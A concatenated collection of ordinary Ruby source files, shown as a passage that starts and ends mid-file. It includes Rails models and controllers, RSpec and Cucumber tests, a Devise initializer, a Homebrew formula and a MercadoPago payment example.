(1 sg.) spravne jelen se promΕeΕi f krΓ‘snΓho koΕe; SvΔtlΓ‘ pod JeΕ‘tΔdem LB; ΔJA Dodatky.
(1 sg.) spravne jelen se promΕeΕi f krΓ‘snΓho koΕe; SvΔtlΓ‘ pod JeΕ‘tΔdem LB (HoΕenΓ Paseky); ΔJA Dodatky.
(1 sg.) blbe jelen se promΕeΕi f krΓ‘snΓho koΕe; SvΔtlΓ‘ pod JeΕ‘tΔdem LB (HoΕenΓ Paseky Blbost); ΔJA Dodatky.
(1 sg.) blbe jelen se promΕeΕi f krΓ‘snΓho koΕe; SvΔtlΓ‘ pod JeΕ‘tΔdem LX (HoΕenΓ Paseky); ΔJA Dodatky.
EOD
      result = entry.import_text(user, jelen_test_data, meaning.id, true, true)
      expect(result.length).to eq(4)
      # Rows 0-1: municipality (and optionally its part) resolved to codes;
      # rows 2-3: unknown part / district, so nothing resolves.
      expect(result[0].lokalizace_obec).to eq("564427")
      expect(result[0].lokalizace_cast_obce).to be_nil
      expect(result[0].lokalizace_text).to eq('')
      expect(result[1].lokalizace_obec).to eq("564427")
      expect(result[1].lokalizace_cast_obce).to eq("160563")
      expect(result[1].lokalizace_text).to eq('')
      expect(result[2].lokalizace_obec).to be_nil
      expect(result[2].lokalizace_cast_obce).to be_nil
      expect(result[2].lokalizace_text).to eq('')
      expect(result[3].lokalizace_obec).to be_nil
      expect(result[3].lokalizace_cast_obce).to be_nil
      expect(result[3].lokalizace_text).to eq('')
    end
    it 'parses all problematic "zkratka okresu"' do
      # The first sample is the Plzen-north district, the second Plzen-south.
      plzen_test_data = <<EOD
stΓ‘la tam {husa, 1 sg.} a mlΔela; Ε½ilov PM (StΓ½skaly); Ε embera, ZΓ‘kladovΓ©
stΓ‘la tam {husa, 1 sg.} a mlΔela; Ε½inkovy PM; Ε embera, ZΓ‘kladovΓ©
EOD
      # Regression data: nothing from the Ostrava (OV) district was being
      # recognised. E.g.:
      ostrava_test_data = <<EOD
stΓ‘la tam {husa, 1 sg.} a mlΔela; Ostrava OV; Ε embera, ZΓ‘kladovΓ©
stΓ‘la tam {husa, 1 sg.} a mlΔela; Ostrava OV (AntoΕ‘ovice); Ε embera, ZΓ‘kladovΓ©
stΓ‘la tam {husa, 1 sg.} a mlΔela; Olbramice OV (Janovice); Ε embera, ZΓ‘kladovΓ©
EOD
      result = entry.import_text(user, plzen_test_data + ostrava_test_data, meaning.id, true, true)
      expect(result.find_all { |r| r.lokalizace_obec.present? }.length).to eq(5)
    end
    it 'parses lokalizace for "lokalizace_text" case' do
      lokalizace_text_test_data = <<EOD
(1 sg.) spravne jelen se promΕeΕi f krΓ‘snΓho koΕe; Blanensko; ΔJA Dodatky.
(1 sg.) spravne jelen se promΕeΕi f krΓ‘snΓho koΕe; Blanensko chyba; ΔJA Dodatky.
EOD
      result = entry.import_text(user, lokalizace_text_test_data, meaning.id, true, true)
      expect(result.length).to eq(2)
      # A known free-text region resolves; an unknown one yields no location.
      expect(result[0].location_text.identifikator).to eq('Blanensko')
      expect(result[1].location_text).to be_nil
    end
    it 'parses source w/o an autor and the location' do
      result = entry.import_text(
        user,
        "stΓ‘la tam {husa, 1 sg.} a mlΔela; Nymburk NB; ObecnΓ‘ ΕeΔ v Nymburce",
        meaning.id, true, true
      )[0]
      expect(result.lokalizace_obec).to eq("537004")
      expect(result.source.name).to eq("ObecnΓ‘ ΕeΔ v Nymburce.")
    end
  end
end
1d104a2a56a290ed5d9a0b5e6c5e81b3160dd19a | 413 | require 'mercadopago.rb'
# Minimal example: create a card payment through the MercadoPago
# /v1/payments API using an access token and a card token.
$mp = MercadoPago.new('ACCESS_TOKEN')

payment_data = {
  "transaction_amount" => 100,
  "token" => "ff8080814c11e237014c1ff593b57b4d",
  "description" => "Title of what you are paying for",
  "installments" => 1,
  "payment_method_id" => "visa",
  "payer" => {
    "email" => "[email protected]"
  }
}

payment = $mp.post("/v1/payments", payment_data)

puts payment
6158d79f64c2f70549d6515d4bd6bebf0805913e | 3,069 | # has_many :iterations
# text :name
# text :friendly_id
# text :description
# integer :session_type
# datetime :last_executed_at
class ::CommandProposal::Task < ApplicationRecord
  self.table_name = :command_proposal_tasks

  # Transient: the acting user, and whether to auto-approve new code.
  attr_accessor :user, :skip_approval

  has_many :iterations
  # Newest iteration first.
  has_many :ordered_iterations, -> { order(created_at: :desc) }, class_name: "CommandProposal::Iteration"

  scope :search, ->(text) {
    where("name ILIKE :q OR description ILIKE :q", q: "%#{text}%")
  }
  # NOTE(review): when +filter+ is present but not a known session type this
  # scope returns nil, which ActiveRecord treats as "no filtering" — confirm
  # that is intended.
  scope :by_session, ->(filter) {
    if filter.present?
      where(session_type: filter) if filter.to_s.in?(session_types.keys)
    else
      where(session_type: :function)
    end
  }
  # Simple offset pagination; page numbers are 1-based.
  scope :cmd_page, ->(page=nil) {
    page = page.presence&.to_i || 1
    per = ::CommandProposal::PAGINATION_PER
    limit(per).offset(per * (page - 1))
  }

  enum session_type: {
    # Function iterations are much like tasks
    function: 1,
    # Task will have multiple iterations that are all essentially the same just with code changes
    task: 0,
    # Console iterations are actually line by line, so order matters
    console: 2,
    # Modules are included in tasks and not run independently
    module: 3,
  }

  validates :name, presence: true

  after_initialize -> { self.session_type ||= :task }
  before_save -> { self.friendly_id = to_param }

  delegate :line_count, to: :current_iteration, allow_nil: true
  delegate :code, to: :current_iteration, allow_nil: true
  delegate :result, to: :current_iteration, allow_nil: true
  delegate :status, to: :primary_iteration, allow_nil: true
  delegate :duration, to: :primary_iteration, allow_nil: true

  # Console "lines": every iteration after the first, oldest first.
  def lines
    iterations.order(created_at: :asc).where.not(id: first_iteration.id)
  end

  # URL slug; generated from the name when not yet persisted.
  def to_param
    friendly_id || generate_friendly_id
  end

  def approved?
    primary_iteration&.approved_at?
  end

  def first_iteration
    ordered_iterations.last
  end

  def current_iteration
    ordered_iterations.first
  end

  # Consoles are judged by their first line; other types by the latest code.
  def primary_iteration
    console? ? first_iteration : current_iteration
  end

  def current_iteration_at
    current_iteration&.completed_at
  end

  def current_iteration_by
    current_iteration&.requester_name
  end

  def started_at
    iterations.minimum(:started_at)
  end

  def completed_at
    iterations.maximum(:completed_at)
  end

  # Assigning code creates a new iteration; with skip_approval set it is
  # immediately approved by the acting user.
  def code=(new_code)
    if skip_approval
      iterations.create(
        code: new_code,
        requester: user,
        status: :approved,
        approver: user,
        approved_at: Time.current
      )
    else
      iterations.create(code: new_code, requester: user)
    end
  end

  private

  # Slugs that would collide with routes.
  def reserved_names
    [
      "new",
      "edit",
    ]
  end

  # Builds a unique, route-safe slug from the name, suffixing a duplicate
  # count until no other task claims it.
  def generate_friendly_id
    return if name.blank?

    temp_id = name.downcase.gsub(/\s+/, "_").gsub(/[^a-z_]/, "")

    loop do
      duplicate_names = self.class.where(friendly_id: temp_id).where.not(id: id)
      return temp_id if duplicate_names.none? && reserved_names.exclude?(temp_id)

      temp_id = "#{temp_id}_#{duplicate_names.count}"
    end
  end
end
26305423c46fe04744ca004fdc21c803ca9682bd | 558 | # frozen_string_literal: true
# Visits the page named by the tab; 'Home' maps to the root path, anything
# else is visited verbatim (lowercased).
When(/I navigate to the '(.*)' page/) do |tab|
  route = tab.downcase
  if route == 'home'
    visit('/')
  else
    visit(route)
  end
end
# NOTE(review): /(not?)/ matches "no" or "not", so the capture is always
# truthy whenever the step matches -- confirm an optional group such as
# /( not)?/ was not intended here and in the steps below.
When(/I do (not?) submit username and password/) do |auth|
  @user = nil if auth
end
Then(/I should (not?) be logged in/) do |_auth|
  expect(@user).to be(nil)
end
Given(/^I am (not?) authenticated$/) do |auth|
  if auth
    expect(@user).to be(nil)
  else
    expect(@user).not_to be(nil)
  end
end
# Asserts the page body matches the given text (regexp match, not equality).
Then('I should see {string}') do |string|
  expect(page.text).to match(string)
end
| 18 | 58 | 0.634409 |
185301615a76cef4744d83889f5a8f08bdf1b0f9 | 554 | When(/^I fill in Associated organisation with "([^"]*)"$/) do |value|
hidden_field = find :xpath, "//input[@id='user_associated_organisation']"
hidden_field.set value
end
When(/^I fill in Associated country with "([^"]*)"$/) do |value|
hidden_field = find :xpath, "//input[@id='user_associated_country']"
user = FactoryGirl.build(:country)
user.save
hidden_field.set value
end
Given(/^a user is associated with an organisation named "(.*?)"$/) do |org|
user = FactoryGirl.build(:user)
user.associated_organisation = org
user.save
end
| 30.777778 | 75 | 0.696751 |
9123858cfa6d4dfcf6cd0aab1d263eb789824569 | 1,703 | # Merb::Router is the request routing mapper for the merb framework.
#
# You can route a specific URL to a controller / action pair:
#
# match("/contact").
# to(:controller => "info", :action => "contact")
#
# You can define placeholder parts of the url with the :symbol notation. These
# placeholders will be available in the params hash of your controllers. For example:
#
# match("/books/:book_id/:action").
# to(:controller => "books")
#
# Or, use placeholders in the "to" results for more complicated routing, e.g.:
#
# match("/admin/:module/:controller/:action/:id").
# to(:controller => ":module/:controller")
#
# You can specify conditions on the placeholder by passing a hash as the second
# argument of "match"
#
# match("/registration/:course_name", :course_name => /^[a-z]{3,5}-\d{5}$/).
# to(:controller => "registration")
#
# You can also use regular expressions, deferred routes, and many other options.
# See merb/specs/merb/router.rb for a fairly complete usage sample.
Merb.logger.info("Compiling routes...")
Merb::Router.prepare do
  # RESTful routes
  # resources :posts
  # Adds the required routes for merb-auth using the password slice
  # slice(:merb_auth_slice_password, :name_prefix => nil, :path_prefix => "")
  # Mount the Chef server slice, which contributes this app's actual routes.
  slice(:chef_server_slice)
  # This is the default route for /:controller/:action/:id
  # This is fine for most cases. If you're heavily using resource-based
  # routes, you may want to comment/remove this line to prevent
  # clients from calling your create or destroy actions with a GET
  default_routes
  # Change this for your home page to be available at /
  # match('/').to(:controller => 'whatever', :action =>'index')
end
| 37.844444 | 85 | 0.698767 |
183c58b0f35e4c8043aab8de4fa2c80c41f1815f | 1,090 | class Cproto < Formula
desc "Generate function prototypes for functions in input files"
homepage "https://invisible-island.net/cproto/"
url "https://invisible-mirror.net/archives/cproto/cproto-4.7o.tgz"
mirror "https://deb.debian.org/debian/pool/main/c/cproto/cproto_4.7o.orig.tar.gz"
sha256 "c76b0b72064e59709459bb7d75d6ec929f77ce5ae7f2610d169ba0fa20ccb44f"
bottle do
cellar :any_skip_relocation
sha256 "10ca6eb5bb793309be3dc367b013b97f3ab199cccfc27b0fac2dbdfcb8b73a62" => :mojave
sha256 "c3cb1dc57b52471d2ce88ee243dbc72bd96984ee23c6508f316fd037f283d144" => :high_sierra
sha256 "371d43e22636bad41b4a37d7abd06bc42b504b0790a14a6c54f0b5d03b693cf3" => :sierra
end
def install
system "./configure", "--disable-debug",
"--disable-dependency-tracking",
"--disable-silent-rules",
"--prefix=#{prefix}"
system "make", "install"
end
test do
(testpath/"woot.c").write("int woot() {\n}")
assert_match(/int woot.void.;/, shell_output("#{bin}/cproto woot.c"))
end
end
| 37.586207 | 93 | 0.699083 |
7a862ebef14bb9332c2908b4bc04070f4cfa3d99 | 1,345 | # -------------------------------------------------------------------------- #
# Copyright 2002-2020, OpenNebula Project, OpenNebula Systems #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); you may #
# not use this file except in compliance with the License. You may obtain #
# a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#--------------------------------------------------------------------------- #
# Schema migrator mixin for this release: reports the target database and
# OpenNebula versions and performs the (empty) upgrade step.
module Migrator
  # Target database schema version.
  def db_version
    '5.4.1'
  end

  # Human-readable OpenNebula release this migration belongs to.
  def one_version
    'OpenNebula 5.4.1'
  end

  # No schema changes are required for this release.
  def up
    true
  end
end
| 44.833333 | 78 | 0.409665 |
397403c3d6ca22c6e868b280cbd72aced6b92826 | 2,063 | module CelluloidIOPGListener
module Initialization
#
# Null Object Pattern, just in case there are no options passed to initialize
#
# @conninfo_hash - Extracted (actually removed!) PG database connection options, such as would be sent to:
# PG.connect( *args ) # PG::Connection.new( *args )
# Options must be the same named parameters that PG.connect() expects in its argument hash
# The other parameter formats are accepted by PG::Connection.new are not supported here.
# Named after, and structurally identical to, PG::Connection#conninfo_hash
# @super_signature - Arguments passed on to super, supports any type of argument signature / arity supported by Ruby itself.
# @channel - The channel to listen to notifications on
# Default: None, raises an error if not provided.
#
class ClientExtractedSignature
# see http://deveiate.org/code/pg/PG/Connection.html for key meanings
KEYS = [:host, :hostaddr, :port, :dbname, :user, :password, :connect_timeout, :options, :tty, :sslmode, :krbsrvname, :gsslib, :service]
attr_reader :super_signature
attr_reader :conninfo_hash
attr_reader :channel
# args - an array
def initialize(*args)
hash_arg = args.last.is_a?(Hash) ? args.pop : {}
# Extract the channel first, as it is required
@channel = hash_arg[:channel] || raise(ArgumentError, "[#{self.class}] :channel is required, but got #{args} and #{hash_arg}")
# Extract the args for PG.connect
@conninfo_hash = (hash_arg.keys & KEYS).
each_with_object({}) { |k,h| h.update(k => hash_arg[k]) }.
# Future proof. Provide a way to send in any PG.connect() options not explicitly defined in KEYS
merge(hash_arg[:conninfo_hash] || {})
# Add any other named parameters back to the args for super
args << hash_arg
@super_signature = args
end
end
end
end
| 49.119048 | 141 | 0.636452 |
e22e65914c64866930a8805fac382a9923ef6b86 | 11,335 | # Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class with default "from" parameter.
config.mailer_sender = "[email protected]"
# Configure the class responsible to send e-mails.
# config.mailer = "Devise::Mailer"
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [ :email ]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [ :email ]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [ :email ]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Basic Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:token]` will
# enable it only for token authentication.
# config.http_authenticatable = false
# If http headers should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. "Application" by default.
# config.http_authentication_realm = "Application"
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# :http_auth and :token_auth by adding those symbols to the array below.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing :skip => :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 10. If
# using other encryptors, it sets how many times you want the password re-encrypted.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments.
config.stretches = Rails.env.test? ? 1 : 10
# Setup a pepper to generate the encrypted password.
# config.pepper = "e0a1729ce89577b6ca7510ca4625d2d5c2cf2d9cfb214629b55d660ff42f44272e75858eed89e3bdf558db8a949c6dd6f512b7f7a0ef787547ed76aeaf59f1fd"
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming his account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming his account,
# access will be blocked just in the third day. Default is 0.days, meaning
# the user cannot access the website without confirming his account.
# config.allow_unconfirmed_access_for = 2.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed new email is stored in
# unconfirmed email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [ :email ]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# :secure => true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length. Default is 6..128.
# config.password_length = 6..128
# Email regex used to validate email formats. It simply asserts that
# an one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
# config.email_regexp = /\A[^@]+@[^@]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# If true, expires auth token on session timeout.
# config.expire_auth_token_on_timeout = false
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [ :email ]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [ :email ]
# Time interval you can reset your password with a reset password key.
# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# ==> Configuration for :encryptable
# Allow you to use another encryption algorithm besides bcrypt (default). You can use
# :sha1, :sha512 or encryptors from others authentication tools as :clearance_sha1,
# :authlogic_sha512 (then you should set stretches above to 20 for default behavior)
# and :restful_authentication_sha1 (then you should set stretches to 10, and copy
# REST_AUTH_SITE_KEY to pepper)
# config.encryptor = :sha512
# ==> Configuration for :token_authenticatable
# Defines name of the authentication token params key
# config.token_authentication_key = :auth_token
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ["*/*", :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', :scope => 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(:scope => :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: "/my_engine"
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using omniauth, Devise cannot automatically set Omniauth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = "/my_engine/users/auth"
# ==> Devise Authy Authentication Extension
# How long should the user's device be remembered for.
config.authy_remember_device = 1.minute
end
| 47.62605 | 150 | 0.746096 |
91dfcaf4d06fb034e148e5af818456e62a656338 | 1,104 | class PostsController < ApplicationController
before_action :set_post, only: [:show, :edit, :update, :destroy]
# GET /posts
def index
@posts = Post.all
end
# GET /posts/1
def show
end
# GET /posts/new
def new
@post = Post.new
end
# GET /posts/1/edit
def edit
end
# POST /posts
def create
@post = Post.new(post_params)
if @post.save
redirect_to @post, notice: 'Post was successfully created.'
else
render :new
end
end
# PATCH/PUT /posts/1
def update
if @post.update(post_params)
redirect_to @post, notice: 'Post was successfully updated.'
else
render :edit
end
end
# DELETE /posts/1
def destroy
@post.destroy
redirect_to posts_url, notice: 'Post was successfully destroyed.'
end
private
# Use callbacks to share common setup or constraints between actions.
def set_post
@post = Post.find(params[:id])
end
# Only allow a trusted parameter "white list" through.
def post_params
params.require(:post).permit(:title, :user_id, :category_id)
end
end
| 18.711864 | 73 | 0.648551 |
ac9b5f47c2f1fea5aca899572b890bc62c46c3cd | 1,066 | require 'formula'
# Homebrew formula for gcab, the GNOME Cabinet (.cab) archive library/tool.
class Gcab < Formula
  homepage 'https://wiki.gnome.org/msitools'
  url 'http://ftp.gnome.org/pub/GNOME/sources/gcab/0.4/gcab-0.4.tar.xz'
  sha1 'd81dfe35125e611e3a94c0d4def37ebf62b9187c'
  depends_on 'intltool' => :build
  depends_on 'pkg-config' => :build
  depends_on 'vala' => :build
  depends_on 'gettext'
  depends_on 'glib'
  depends_on 'gobject-introspection'
  # work around ld not understanding --version-script argument
  # upstream bug: https://bugzilla.gnome.org/show_bug.cgi?id=708257
  # (the patch body lives after __END__ below)
  patch :DATA
  def install
    system "./configure", "--disable-debug",
                          "--prefix=#{prefix}"
    system "make", "install"
  end
end
__END__
diff --git a/Makefile.in b/Makefile.in
index 2264c17..7782d62 100644
--- a/Makefile.in
+++ b/Makefile.in
@@ -474,7 +474,7 @@ libgcab_1_0_la_CPPFLAGS = \
libgcab_1_0_la_LIBADD = -lz $(GLIB_LIBS)
libgcab_1_0_la_LDFLAGS = \
-version-info 0:0:0 \
- -Wl,--version-script=${srcdir}/libgcab.syms \
+ -Wl \
-no-undefined \
$(NULL)
| 26.65 | 71 | 0.652908 |
4ad2b99b7e8985ff40b7e19d9988865c56da9379 | 1,773 | #
# Cookbook:: prometheus
# Recipe:: elasticsearch_exporter
#
# Copyright:: 2018, BaritoLog.
# Ensures the shared prometheus user/group exist before resources below use them.
include_recipe "prometheus::user"
# Create directory
directory node["elasticsearch_exporter"]["dir"] do
  owner node["prometheus"]["user"]
  group node["prometheus"]["group"]
  mode "0755"
  recursive true
end
# Log directory written to by the systemd unit's output redirection below.
directory node["elasticsearch_exporter"]["log_dir"] do
  owner node["prometheus"]["user"]
  group node["prometheus"]["group"]
  mode "0755"
  recursive true
end
# Download prometheus elasticsearch_exporter binary & unpack
ark ::File.basename(node["elasticsearch_exporter"]["dir"]) do
  url node["elasticsearch_exporter"]["binary_url"]
  checksum node["elasticsearch_exporter"]["checksum"]
  version node["elasticsearch_exporter"]["version"]
  prefix_root Chef::Config["file_cache_path"]
  path ::File.dirname(node["elasticsearch_exporter"]["dir"])
  owner node["prometheus"]["user"]
  group node["prometheus"]["group"]
  action :put
  notifies :restart, "service[elasticsearch_exporter]", :delayed
end
# Systemd unit that runs the exporter and appends stdout/stderr to the log file.
systemd_unit "elasticsearch_exporter.service" do
  content <<~END_UNIT
    [Unit]
    Description=Prometheus Elasticsearch Exporter
    After=network.target
    [Service]
    ExecStart=/bin/bash -ce 'exec #{node["elasticsearch_exporter"]["binary"]} #{Gitlab::Prometheus.kingpin_flags_for(node, "elasticsearch_exporter")} >> "#{node["elasticsearch_exporter"]["log_dir"]}/elasticsearch_exporter.log" 2>&1'
    User=#{node["prometheus"]["user"]}
    Restart=always
    [Install]
    WantedBy=multi-user.target
  END_UNIT
  action %i(create enable)
  notifies :restart, "service[elasticsearch_exporter]", :delayed
end
service "elasticsearch_exporter" do
  action %i(enable start)
end
| 30.568966 | 240 | 0.702764 |
08fc975dee57bd75ff8780f0b8a1f22d9731a6a0 | 1,946 | lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "codenewbie/version"
Gem::Specification.new do |spec|
spec.name = "codenewbie"
spec.version = Codenewbie::VERSION
spec.authors = ["Molly McCarron"]
spec.email = ["[email protected]"]
spec.summary = %q{Codenewbie podcast CLI.}
spec.description = %q{Lists of podcast epsiodes from https://www.codenewbie.org/podcast}
spec.homepage = "https://github.com/mccarronmollye/codenewbie"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
#if spec.respond_to?(:metadata)
# spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
# spec.metadata["homepage_uri"] = spec.homepage
# spec.metadata["source_code_uri"] = "TODO: Put your gem's public repo URL here."
# spec.metadata["changelog_uri"] = "TODO: Put your gem's CHANGELOG.md URL here."
#else
# raise "RubyGems 2.0 or newer is required to protect against " \
# "public gem pushes."
#end
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "bin"
spec.executables = ["codenewbie"]
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.17"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
spec.add_development_dependency "pry"
spec.add_development_dependency "gem-release"
spec.add_development_dependency "nokogiri"
end | 44.227273 | 96 | 0.684995 |
e8cd1760139a4d5a757dc0dbc08837565cf9eddb | 1,230 | require 'spec_helper'
# Controller specs for the notifications read/unread/trash lifecycle.
describe NotificationsController do
  include SocialStream::TestHelpers
  render_views
  before do
    @user = Factory(:user)
    @actor = @user.actor
    sign_in @user
    # Seed one notification receipt for the signed-in user.
    @receipt = @user.notify("subject", "body", Factory(:activity))
  end
  it "should render index" do
    get :index
    assert_response :success
  end
  it "should update read" do
    put :update, :id => @receipt.notification.to_param, :read => "Read"
    @receipt.notification.is_unread?(@actor).should==false
    assert_response :success
  end
  it "should update unread" do
    put :update, :id => @receipt.notification.to_param, :read => "Unread"
    @receipt.notification.is_unread?(@actor).should==true
    assert_response :success
  end
  it "should update all" do
    @receipt2 = @user.notify("subject", "body", Factory(:activity))
    put :update_all
    @receipt.notification.is_unread?(@actor).should==false
    @receipt2.notification.is_unread?(@actor).should==false
    response.should redirect_to(notifications_path)
  end
  it "should send to trash" do
    delete :destroy, :id => @receipt.notification.to_param
    @receipt.notification.is_trashed?(@actor).should==true
    assert_response :success
  end
end
| 26.170213 | 73 | 0.699187 |
796bb85b8fe2528c5a26f265307a09763022d4bc | 1,271 | require 'rails_spec_helper'
# Verifies that the AppMap Railtie sets Rails.configuration.appmap.enabled
# from the APPMAP / RAILS_ENV environment variables by running a rails-runner
# one-liner inside the fixture app's docker-compose service.
describe 'AppMap tracer via Railtie' do
  before(:all) { @fixture_dir = 'spec/fixtures/rails_users_app' }
  include_context 'Rails app pg database'
  let(:env) { {} }
  let(:cmd) { %(docker-compose run --rm -e RAILS_ENV -e APPMAP app ./bin/rails r "puts Rails.configuration.appmap.enabled.inspect") }
  let(:command_capture2) do
    require 'open3'
    # capture3 returns [stdout, stderr, status]; on failure, dump the output
    # and abort so the examples below fail with useful context.
    # NOTE(review): `result[2] == 0` compares a Process::Status to an Integer,
    # which relies on legacy coercion -- `result[2].success?` may be safer.
    Open3.capture3(env, cmd, chdir: @fixture_dir).tap do |result|
      unless result[2] == 0
        $stderr.puts <<~END
          Failed to run rails_users_app container
          <<< Output:
          #{result[0]}
          #{result[1]}
          >>> End of output
        END
        raise 'Failed to run rails_users_app container'
      end
    end
  end
  let(:command_output) { command_capture2[0].strip }
  let(:command_result) { command_capture2[2] }
  it 'is disabled by default' do
    expect(command_output).to eq('nil')
  end
  describe 'with APPMAP=true' do
    let(:env) { { 'APPMAP' => 'true' } }
    it 'is enabled' do
      expect(command_output).to eq('true')
    end
    context 'and RAILS_ENV=test' do
      let(:env) { { 'APPMAP' => 'true', 'RAILS_ENV' => 'test' } }
      it 'is disabled' do
        expect(command_output).to eq('nil')
      end
    end
  end
end
| 28.244444 | 133 | 0.612116 |
21b890d27c203586a931b6078ab08c7de788c721 | 20,985 | # Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
require 'logger'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# Subscription object which contains the common subscription data.
class OspGateway::Models::SubscriptionSummary
